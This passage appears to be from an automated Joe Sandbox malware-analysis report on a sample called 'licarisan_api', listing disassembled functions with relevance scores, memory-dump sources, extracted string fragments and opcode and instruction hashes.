                                    • Opcode Fuzzy Hash: f804407e4b2c59fa78ad1642245432061ad90c281026a65c4e5b18163912a8fd
                                    • Instruction Fuzzy Hash: 94F1D8A1D086948FF7218624DC447EABA79EF92304F0481F9D54D67382D6BE0FD48F62
                                    Function 004255AF Relevance: 20.1, Strings: 16, Instructions: 129COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516137583.0000000000420000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_420000_licarisan_api.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: JI9N$KB<O$L$L$W$XS$a$a$b$d$i$o$r$r$u7V$y
                                    • API String ID: 0-1179719566
                                    • Opcode ID: 97f59a78038705dae9e27f31a84631499b9c5eac8d0b701ae58ba1310839910b
                                    • Instruction ID: a95e35ec970552aee82520789b3426ff6955b1624cfd0778b672343b38849985
                                    • Opcode Fuzzy Hash: 97f59a78038705dae9e27f31a84631499b9c5eac8d0b701ae58ba1310839910b
                                    • Instruction Fuzzy Hash: 93418CB1D059648AD7209B94DC417EAB7B1FF89311F5090EAD84DA7200E2386EC1CFA6
                                    Function 004253D9 Relevance: 18.9, Strings: 15, Instructions: 101COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516137583.0000000000420000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_420000_licarisan_api.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: JI9N$L$L$W$XS$a$a$b$d$i$o$r$r$u7V$y
                                    • API String ID: 0-1821653520
                                    • Opcode ID: 19b9d58ad2addf9538037152b34ff159d14b250c315f5e69698dfe1ff32de387
                                    • Instruction ID: bf1e39dfa2e40ed735afd83b0657a99c4470b4152dab3dec8cf54ad88e3e233e
                                    • Opcode Fuzzy Hash: 19b9d58ad2addf9538037152b34ff159d14b250c315f5e69698dfe1ff32de387
                                    • Instruction Fuzzy Hash: C9319DB5D155349ADB209B94DC41BEBB7B5FF88311F1090FAD94DA7200E2385EC1CBA6
                                    Function 007B46C4 Relevance: 17.7, Strings: 14, Instructions: 206COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516514758.00000000007B2000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B2000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7b2000_licarisan_api.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: $5ZWP$L$L$W$a$a$b$d$i$o$r$r$y
                                    • API String ID: 0-3300391464
                                    • Opcode ID: 9c245e819d567d922ddc5a507a7922967f7ebf691b23e993a550b77b97a83b71
                                    • Instruction ID: f2ead5c23293f4aefc9f9847524965fcac93eac02f00d577b04d57fa9b376d7f
                                    • Opcode Fuzzy Hash: 9c245e819d567d922ddc5a507a7922967f7ebf691b23e993a550b77b97a83b71
                                    • Instruction Fuzzy Hash: D881D4A1D086689AFB208B24DC447EA7775EFA0704F0480F9D94DA7781E37E0ED5CB26
                                    Function 007B48A5 Relevance: 16.6, Strings: 13, Instructions: 321COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516514758.00000000007B2000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B2000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7b2000_licarisan_api.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: $L$L$W$a$a$b$d$i$o$r$r$y
                                    • API String ID: 0-572988056
                                    • Opcode ID: 69c2375d1b976ba8ba29afa500910bcf711f0554b72ddaa425017fa237391afd
                                    • Instruction ID: 54989faef79cc4890e4a3093fcc743d28444f0a193531649b0ab82dcce4e6ea0
                                    • Opcode Fuzzy Hash: 69c2375d1b976ba8ba29afa500910bcf711f0554b72ddaa425017fa237391afd
                                    • Instruction Fuzzy Hash: F6C1FEA1D146689FFB208B24DC04BEAB775EF95300F0481FAD90DA7282E7795EC58F16
                                    Function 007B4677 Relevance: 16.5, Strings: 13, Instructions: 275COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516514758.00000000007B2000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B2000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7b2000_licarisan_api.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: $L$L$W$a$a$b$d$i$o$r$r$y
                                    • API String ID: 0-572988056
                                    • Opcode ID: 44cb24eba65606c1166d7644c239221e9fdf2abc9c31d862ef3f431adbc2bf62
                                    • Instruction ID: 1d41d61696faaeb6f83d9788da3d26cc202051485ec3c7bef9a3d7a00e00d122
                                    • Opcode Fuzzy Hash: 44cb24eba65606c1166d7644c239221e9fdf2abc9c31d862ef3f431adbc2bf62
                                    • Instruction Fuzzy Hash: D2B1C3A1D046688AFB208B25DC44BEAB775EF91304F0480FAD94D67281E77E4EC5CF66
                                    Function 007B467C Relevance: 16.5, Strings: 13, Instructions: 228COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516514758.00000000007B2000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B2000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7b2000_licarisan_api.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: $L$L$W$a$a$b$d$i$o$r$r$y
                                    • API String ID: 0-572988056
                                    • Opcode ID: 3c3711a4f4a8d9953aaf1bf67dc889b3530e64d78918102746bc0bf6a2190a81
                                    • Instruction ID: 31e55d4428be2dc01bc2485e1703538c826575187598493f724c0ca305d066cb
                                    • Opcode Fuzzy Hash: 3c3711a4f4a8d9953aaf1bf67dc889b3530e64d78918102746bc0bf6a2190a81
                                    • Instruction Fuzzy Hash: 2491D6A1D046589AFB208B25DC44BEAB779EF91704F0480FAD90D67381E37E0EC5CB26
                                    Function 007B468A Relevance: 16.5, Strings: 13, Instructions: 225COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516514758.00000000007B2000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B2000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7b2000_licarisan_api.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: $L$L$W$a$a$b$d$i$o$r$r$y
                                    • API String ID: 0-572988056
                                    • Opcode ID: b255ba1d48f57c8064a987c58bef088803b1bd00f1dadd548c70d7fc876133b7
                                    • Instruction ID: 55a1a05e5a6d9b2e7339a985b4d82b1c2388a37b2aed7fe38a28277a57372afd
                                    • Opcode Fuzzy Hash: b255ba1d48f57c8064a987c58bef088803b1bd00f1dadd548c70d7fc876133b7
                                    • Instruction Fuzzy Hash: C191D5A1D046589AFB208B25DC44BEAB775EF91704F0480F9D90DA7381E37E0ED5CB26
                                    Function 007B45C6 Relevance: 16.4, Strings: 13, Instructions: 180COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516514758.00000000007B2000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B2000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7b2000_licarisan_api.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: $L$L$W$a$a$b$d$i$o$r$r$y
                                    • API String ID: 0-572988056
                                    • Opcode ID: 0f9492a092ebc81cc9c7a12689f7382ef4bac5a618cf7a408d267f403c00a0de
                                    • Instruction ID: 18bae8a3b5ca29fb9dc175de35c8babb5c46aa2eb1979fe251da8c6320b6e4b7
                                    • Opcode Fuzzy Hash: 0f9492a092ebc81cc9c7a12689f7382ef4bac5a618cf7a408d267f403c00a0de
                                    • Instruction Fuzzy Hash: 1C6105A1D086A88AF7208624DC447EAB736EF91304F0480F9C94D67682D77E1FC5CF66
                                    Function 007B4843 Relevance: 16.4, Strings: 13, Instructions: 161COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516514758.00000000007B2000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B2000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7b2000_licarisan_api.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: $L$L$W$a$a$b$d$i$o$r$r$y
                                    • API String ID: 0-572988056
                                    • Opcode ID: 56316377e7edddd9756813443838ea8b7ad9cf4187f3463a42878c778953d247
                                    • Instruction ID: b281c07892ce7a7b90202060ffcef1fd184cda71759e92f0c7292564c6a6bd12
                                    • Opcode Fuzzy Hash: 56316377e7edddd9756813443838ea8b7ad9cf4187f3463a42878c778953d247
                                    • Instruction Fuzzy Hash: 2B51E4A1D086A8CAF720C624DC44BEAB676EF91304F0480F9C94D67682D37E1ED5CF66
                                    Function 007B4631 Relevance: 16.4, Strings: 13, Instructions: 147COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516514758.00000000007B2000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B2000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7b2000_licarisan_api.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: $L$L$W$a$a$b$d$i$o$r$r$y
                                    • API String ID: 0-572988056
                                    • Opcode ID: 2e7120378d6103acd20ef500ee2020b8ea8a198172303fcebf36e7493a2d0e72
                                    • Instruction ID: 2091a1666e81b710d2f837b05fc3e97301688da7bf06f6c01e0038b2b36e95ea
                                    • Opcode Fuzzy Hash: 2e7120378d6103acd20ef500ee2020b8ea8a198172303fcebf36e7493a2d0e72
                                    • Instruction Fuzzy Hash: FD51F9A1D096A8CAF7208624DC447EA7676EF91304F0480F9D94D676C2D37E0FD5CB66
                                    Function 007F29EE Relevance: 15.5, Strings: 12, Instructions: 472COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516559420.00000000007C8000.00000040.00000001.01000000.00000003.sdmp, Offset: 007C8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7c8000_licarisan_api.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: E$OP=6$P$c$e$i$o$r$s$s$t$x
                                    • API String ID: 0-1470631180
                                    • Opcode ID: 09ebfc3cee5769e0a15467dc5eb146999280db3e56de0ae44ecba8c86fbbb221
                                    • Instruction ID: a9497bdacdfcf33b79b82a1cddb799791f99be43b9afb7fffedb8d3c635a4b74
                                    • Opcode Fuzzy Hash: 09ebfc3cee5769e0a15467dc5eb146999280db3e56de0ae44ecba8c86fbbb221
                                    • Instruction Fuzzy Hash: 7B12E0B1D041688BEB24CB24DC94BEABBB5EB84314F1041EAD90D67382E7795EC6CF51
                                    Function 0042EF71 Relevance: 15.4, Strings: 12, Instructions: 424COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516137583.0000000000420000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_420000_licarisan_api.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: L$L$W$a$a$b$d$i$o$r$r$y
                                    • API String ID: 0-4069139063
                                    • Opcode ID: fe0036600aaa71d9036da78b86e7ce1179d25894a265d1a965c112d28492b465
                                    • Instruction ID: 3b0d6356ec5096719eb188195106c3d4840c866f5eb3253a309b61cbfe0bcb14
                                    • Opcode Fuzzy Hash: fe0036600aaa71d9036da78b86e7ce1179d25894a265d1a965c112d28492b465
                                    • Instruction Fuzzy Hash: 76F1E2B2E041689AF7208A14DC44BEBB775EF90310F5480FAD84DA7280D6BD5EC6CF66
                                    Function 007F0BD4 Relevance: 15.4, Strings: 12, Instructions: 409COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516559420.00000000007C8000.00000040.00000001.01000000.00000003.sdmp, Offset: 007C8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7c8000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ContextThreadWow64
                                    • String ID: L$L$W$a$a$b$d$i$o$r$r$y
                                    • API String ID: 983334009-4069139063
                                    • Opcode ID: 6002af12fce6735153e62216972465451b220012b5d71a7e03f4f33cdb3df015
                                    • Instruction ID: e04ed47e3fa3dee2c332e455e23ac4ae7fbd3e828089d22b8b571c6959cea58e
                                    • Opcode Fuzzy Hash: 6002af12fce6735153e62216972465451b220012b5d71a7e03f4f33cdb3df015
                                    • Instruction Fuzzy Hash: 76026BB0E082A88BEB24CB24CC94BAAB7B5FF54300F1081E9D549A7381D7799FC58F51
                                    Function 007DBDF4 Relevance: 15.2, Strings: 12, Instructions: 238COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516559420.00000000007C8000.00000040.00000001.01000000.00000003.sdmp, Offset: 007C8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7c8000_licarisan_api.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: L$L$W$a$a$b$d$i$o$r$r$y
                                    • API String ID: 0-4069139063
                                    • Opcode ID: 8612cae6313896ea96477478bb1756454fa7e0429fa3a15928fe8ac81b2371f8
                                    • Instruction ID: 3a667f95661f39c4e01d96a8b5e2dc4927084600ea4158afe643b3cad93730cd
                                    • Opcode Fuzzy Hash: 8612cae6313896ea96477478bb1756454fa7e0429fa3a15928fe8ac81b2371f8
                                    • Instruction Fuzzy Hash: C4A19FB2D04569CAEB20CB24DC487EAB6B5EF54310F0480FAD90DA7780DA7A4FC19F65
                                    Function 007F285D Relevance: 15.2, Strings: 12, Instructions: 206COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516559420.00000000007C8000.00000040.00000001.01000000.00000003.sdmp, Offset: 007C8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7c8000_licarisan_api.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: E$OP=6$P$c$e$i$o$r$s$s$t$x
                                    • API String ID: 0-1470631180
                                    • Opcode ID: 1bedcd799b3704fa16c4836ddb8c7196d694dff6ab7d5edf8c59857ade6502c2
                                    • Instruction ID: 49b2e0aa4c2bc6a739f4bc7bc73e817d33109c7dea1006be2841cfe2c173f8d4
                                    • Opcode Fuzzy Hash: 1bedcd799b3704fa16c4836ddb8c7196d694dff6ab7d5edf8c59857ade6502c2
                                    • Instruction Fuzzy Hash: BE71F4B2D041989AF7208A14DC49BEBBB75EB84310F1481F9D90D26781D7BD5FCACB62
                                    Function 007B5474 Relevance: 4.1, Strings: 3, Instructions: 306COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516514758.00000000007B2000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B2000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7b2000_licarisan_api.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: $1C{1C{l$1C{1C{l
                                    • API String ID: 0-608512137
                                    • Opcode ID: ca86fb6c8a59021c4adaea8a7a5d9142cd9dbaa9ae9cc8dd90b9c02cf93f85f7
                                    • Instruction ID: d220825f4ca799705e0f7442febec672842cedfd735eb7c870747f0426867b36
                                    • Opcode Fuzzy Hash: ca86fb6c8a59021c4adaea8a7a5d9142cd9dbaa9ae9cc8dd90b9c02cf93f85f7
                                    • Instruction Fuzzy Hash: 18D16EB1E046688FEB24CB14DC95BEAB7B5EF44314F2481EAD90EA7241DA385EC1CF51
                                    Function 007CD174 Relevance: 3.9, Strings: 3, Instructions: 193COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516559420.00000000007C8000.00000040.00000001.01000000.00000003.sdmp, Offset: 007C8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7c8000_licarisan_api.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: W$W$XQ
                                    • API String ID: 0-1709571651
                                    • Opcode ID: 660cf32cec87aaa18b0f71f848016d5f62cb378498d262cd5e7b4eecd99bfccb
                                    • Instruction ID: 3710991d6b2d964e91331fea5787140b5638503380775771f9adbbb765a82c57
                                    • Opcode Fuzzy Hash: 660cf32cec87aaa18b0f71f848016d5f62cb378498d262cd5e7b4eecd99bfccb
                                    • Instruction Fuzzy Hash: C761F4B2D14604AFE7258B10DC95EEBB778FB84310F1441FED84A96241D63DAFC18E52
                                    Function 007CD42B Relevance: 3.9, Strings: 3, Instructions: 136COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516559420.00000000007C8000.00000040.00000001.01000000.00000003.sdmp, Offset: 007C8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7c8000_licarisan_api.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: W$W$XQ
                                    • API String ID: 0-1709571651
                                    • Opcode ID: 014977726cdc147d23291b60190d12507f851127c1400ed98ba7125d8acd9394
                                    • Instruction ID: 4d586733c7f8929b359d6f84bdedd6620fb0ecb0d7f9be193eb083224f2fdfb1
                                    • Opcode Fuzzy Hash: 014977726cdc147d23291b60190d12507f851127c1400ed98ba7125d8acd9394
                                    • Instruction Fuzzy Hash: 7541B5B2D145149FE7248B14DC95AFB77B8EB84310F1441BED90996281D73CAEC1CF51
                                    Function 007B4BD5 Relevance: 3.0, Strings: 2, Instructions: 494COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516514758.00000000007B2000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B2000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7b2000_licarisan_api.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: $LoadLibraryW
                                    • API String ID: 0-1993675180
                                    • Opcode ID: 0079dc47bab233b124bb53880fb4599766d435f883b04591b3aab9fa35308d07
                                    • Instruction ID: 96852ac6867df43a6c7a59145d4e38dd9386f8c090b38d7d112ba091ae2b45ce
                                    • Opcode Fuzzy Hash: 0079dc47bab233b124bb53880fb4599766d435f883b04591b3aab9fa35308d07
                                    • Instruction Fuzzy Hash: 07129DB1E046288FEB24CB14DC94BEABBB5FF85311F1481EAD849A7241D6785EC1CF52
                                    Function 007A960E Relevance: 1.7, Strings: 1, Instructions: 452COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 9:>5
                                    • API String ID: 0-2465060655
                                    • Opcode ID: c782c07994cc7461cffac5bda77c954f49b502a8b17efd2cf54f71845c538bb9
                                    • Instruction ID: 356f250cab06049e4ab14e207d23a875155de6720ba2dc8f9523bf1bf2f16797
                                    • Opcode Fuzzy Hash: c782c07994cc7461cffac5bda77c954f49b502a8b17efd2cf54f71845c538bb9
                                    • Instruction Fuzzy Hash: 6102DFB1D042699FEB248B14CC84BEABBB5FFC6304F1442EAD549A7641D6385ED1CF42
                                    Function 008224CC Relevance: 1.6, Strings: 1, Instructions: 332COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516916549.00000000007FA000.00000040.00000001.01000000.00000003.sdmp, Offset: 007FA000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7fa000_licarisan_api.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID: 0-399585960
                                    • Opcode ID: 0ad6f738089e95c95d10291a5ce472eb5cea18778c4b9f6c7662b12629bd9376
                                    • Instruction ID: f4567115af2b8acf9de9e276e171c8efe1cf63615a67f6ea8ae9f8a3a04b312a
                                    • Opcode Fuzzy Hash: 0ad6f738089e95c95d10291a5ce472eb5cea18778c4b9f6c7662b12629bd9376
                                    • Instruction Fuzzy Hash: 83E169B1D146399BDB24CB18DC90AFAB7B5FB89314F1481FAD80EA6640DA385EC1CF51
                                    Function 007F4053 Relevance: 1.5, Strings: 1, Instructions: 283COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516559420.00000000007C8000.00000040.00000001.01000000.00000003.sdmp, Offset: 007C8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7c8000_licarisan_api.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID: 0-399585960
                                    • Opcode ID: 559af9f723b5c66aaa21223914cb77e7ac2105286ca1ecc15f1440213d1681ed
                                    • Instruction ID: fd8af5c9ee3cdbc57d5a3141af1046ee6b822875f3f9535f6f9b1b96eb7cb218
                                    • Opcode Fuzzy Hash: 559af9f723b5c66aaa21223914cb77e7ac2105286ca1ecc15f1440213d1681ed
                                    • Instruction Fuzzy Hash: C4C17AB1D006688BEB24CA04CC94BBAB7B5BB85319F1481EAE90D67341DB385FC5CE51
                                    Function 007A7B2D Relevance: 1.5, Strings: 1, Instructions: 243COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: _R
                                    • API String ID: 0-1717569336
                                    • Opcode ID: a55bfe17098e925d3f66f0725696e7e47e0469bbdf027c923e602ba578985d7b
                                    • Instruction ID: 9330cd971ae0f2083e37bbfcc86c3c8c4cc052d540be91ce20a8940649a1be44
                                    • Opcode Fuzzy Hash: a55bfe17098e925d3f66f0725696e7e47e0469bbdf027c923e602ba578985d7b
                                    • Instruction Fuzzy Hash: ADA1C1A1C096A8CBEB64DB24CC447EAB775EF92304F0881F9C44C67251E67A4FC5CB66
                                    Function 00435118 Relevance: 1.5, Strings: 1, Instructions: 241COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516137583.0000000000420000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_420000_licarisan_api.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: EDMN
                                    • API String ID: 0-783159248
                                    • Opcode ID: c040e6a4eedfda0957ba91badda29fc1971905d93f761a471edb4fd8eb7961f0
                                    • Instruction ID: 743e727d18510ddbc93d45358a1002c055be2ad084a9bcf35ab30f89e66f6e00
                                    • Opcode Fuzzy Hash: c040e6a4eedfda0957ba91badda29fc1971905d93f761a471edb4fd8eb7961f0
                                    • Instruction Fuzzy Hash: F99123B1D145689AEB248B24DC40BEA7775EF89310F1451FFD80D9B281EA398EC2CB56
                                    Function 007F3FC7 Relevance: 1.4, Strings: 1, Instructions: 117COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516559420.00000000007C8000.00000040.00000001.01000000.00000003.sdmp, Offset: 007C8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7c8000_licarisan_api.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID: 0-399585960
                                    • Opcode ID: e256a2330ec57b355c15debc862d669141328d2e7ae141531982cc4419e5f3b2
                                    • Instruction ID: 9b3b198801c171b629fcfc2e7c09a5ac0fb93a3129f7cc75daf0c2319f4fe106
                                    • Opcode Fuzzy Hash: e256a2330ec57b355c15debc862d669141328d2e7ae141531982cc4419e5f3b2
                                    • Instruction Fuzzy Hash: 8441E5B2D046589BF7608A14DC84BFBB7B9EBD4314F1480FAE90C66781D63C5EC68A51
                                    Function 004306B3 Relevance: 1.4, Strings: 1, Instructions: 108COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516137583.0000000000420000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_420000_licarisan_api.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: u7V
                                    • API String ID: 0-3854151070
                                    • Opcode ID: 8c77907cb1d1dfdc0771fbce7911924dc16935d096f8268badf8bba380204d9a
                                    • Instruction ID: c221d02b2520a5672aa7fa0a8ab7c47814a2fbf31111458dacdc48eaf3a88227
                                    • Opcode Fuzzy Hash: 8c77907cb1d1dfdc0771fbce7911924dc16935d096f8268badf8bba380204d9a
                                    • Instruction Fuzzy Hash: 2D4121B0D051648FEB24CB14CCA5BEABBB0EB94304F1412EBD44A16281E7785BC2CF4A
                                    Function 007F018B Relevance: .4, Instructions: 398COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516559420.00000000007C8000.00000040.00000001.01000000.00000003.sdmp, Offset: 007C8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7c8000_licarisan_api.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 8d48b64be3b19c1b4c1fc6b7170e9e01878e85f5788f608791a48b1bbc1daa95
                                    • Instruction ID: 23f6e801e1fceab4a51ff97552b00edc44665039f59637001dfc522cdc3dd3ae
                                    • Opcode Fuzzy Hash: 8d48b64be3b19c1b4c1fc6b7170e9e01878e85f5788f608791a48b1bbc1daa95
                                    • Instruction Fuzzy Hash: 83F19CB0D051688BEB24CB14CC94AFAB7B5FB85304F1481EAD50DA6786D6785EC2CF91
                                    Function 007FD56A Relevance: .4, Instructions: 374COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516916549.00000000007FA000.00000040.00000001.01000000.00000003.sdmp, Offset: 007FA000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7fa000_licarisan_api.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 4efd85ac5b02421b4e43edea8a9e96ef14ccd8cc9f349d776a36b7957349a557
                                    • Instruction ID: b109d660fc1193fbf24bed3db48a735a0adb5b9637de5e76367cef3b98d00334
                                    • Opcode Fuzzy Hash: 4efd85ac5b02421b4e43edea8a9e96ef14ccd8cc9f349d776a36b7957349a557
                                    • Instruction Fuzzy Hash: 65D1F5B2D04129CAEB348B54CC59BFFBB76EB81314F1440BAD609A7380E67C5EC5DA91
                                    Function 007DC9CB Relevance: .2, Instructions: 210COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516559420.00000000007C8000.00000040.00000001.01000000.00000003.sdmp, Offset: 007C8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7c8000_licarisan_api.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: be695bcd3f57cd2e732cc3c3e36be164d4ff47ff85747d923d86f4346d9598f1
                                    • Instruction ID: 6dae05722c9242939c3937aed3932f1c8277504eb2a352b3f1d038430063c11c
                                    • Opcode Fuzzy Hash: be695bcd3f57cd2e732cc3c3e36be164d4ff47ff85747d923d86f4346d9598f1
                                    • Instruction Fuzzy Hash: 0671D1F2C545689FF7248A20DC48AEB7B75EB84311F1482BAD90E52780D67C5EC6CE51
                                    Function 007F07A9 Relevance: .2, Instructions: 205COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516559420.00000000007C8000.00000040.00000001.01000000.00000003.sdmp, Offset: 007C8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7c8000_licarisan_api.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 3e60ce0f3ea678a59d326fa145eb58d328bba1c537d9ad5e53077aa990bf643b
                                    • Instruction ID: b6ed5a7be63605816499b70f856b1d53af0a177651cdb52ecca213557417dff1
                                    • Opcode Fuzzy Hash: 3e60ce0f3ea678a59d326fa145eb58d328bba1c537d9ad5e53077aa990bf643b
                                    • Instruction Fuzzy Hash: 7271FEB1E046589BF7208A21DC49BBA7779FF94310F1081FAD44997780E27D5FC68BA2
                                    Function 007F125E Relevance: .2, Instructions: 193COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516559420.00000000007C8000.00000040.00000001.01000000.00000003.sdmp, Offset: 007C8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7c8000_licarisan_api.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
